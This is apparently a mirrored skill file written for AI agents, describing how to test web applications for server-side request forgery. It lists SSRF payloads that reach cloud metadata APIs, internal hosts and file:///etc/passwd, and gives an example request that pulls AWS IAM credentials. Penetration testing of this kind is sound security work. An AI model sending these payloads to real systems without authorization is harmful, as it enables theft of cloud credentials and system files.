mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-13 10:55:17 +03:00
55 lines
2.1 KiB
Markdown
55 lines
2.1 KiB
Markdown
---
|
|
name: performing-ssrf-vulnerability-exploitation
|
|
description: >-
|
|
Test for Server-Side Request Forgery vulnerabilities by probing cloud metadata endpoints,
|
|
internal network services, and protocol handlers through user-controllable URL parameters.
|
|
Tests AWS/GCP/Azure metadata APIs (169.254.169.254), internal port scanning via HTTP,
|
|
URL scheme bypass techniques, and DNS rebinding detection.
|
|
domain: cybersecurity
|
|
subdomain: security-operations
|
|
tags: [performing, ssrf, vulnerability, exploitation]
|
|
version: "1.0"
|
|
author: mahipal
|
|
license: Apache-2.0
|
|
---
|
|
|
|
|
|
## When to Use
|
|
|
|
- When conducting security assessments that involve performing ssrf vulnerability exploitation
|
|
- When following incident response procedures for related security events
|
|
- When performing scheduled security testing or auditing activities
|
|
- When validating security controls through hands-on testing
|
|
|
|
## Prerequisites
|
|
|
|
- Familiarity with security operations concepts and tools
|
|
- Access to a test or lab environment for safe execution
|
|
- Python 3.8+ with required dependencies installed
|
|
- Appropriate authorization for any testing activities
|
|
|
|
## Instructions
|
|
|
|
1. Install dependencies: `pip install requests`
|
|
2. Identify URL parameters in the target application that accept URLs or hostnames.
|
|
3. Test SSRF payloads:
|
|
- Cloud metadata: `http://169.254.169.254/latest/meta-data/`
|
|
- Internal services: `http://127.0.0.1:port/`, `http://10.0.0.1/`
|
|
- Protocol handlers: `file:///etc/passwd`, `gopher://`, `dict://`
|
|
- Bypass techniques: IP encoding, DNS rebinding, URL redirects
|
|
4. Analyze responses for information disclosure or internal access confirmation.
|
|
5. Generate a vulnerability assessment report.
|
|
|
|
```bash
|
|
# For authorized penetration testing and lab environments only
|
|
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
|
|
```
|
|
|
|
## Examples
|
|
|
|
### AWS Metadata SSRF
|
|
```
|
|
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
```
|
|
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.
|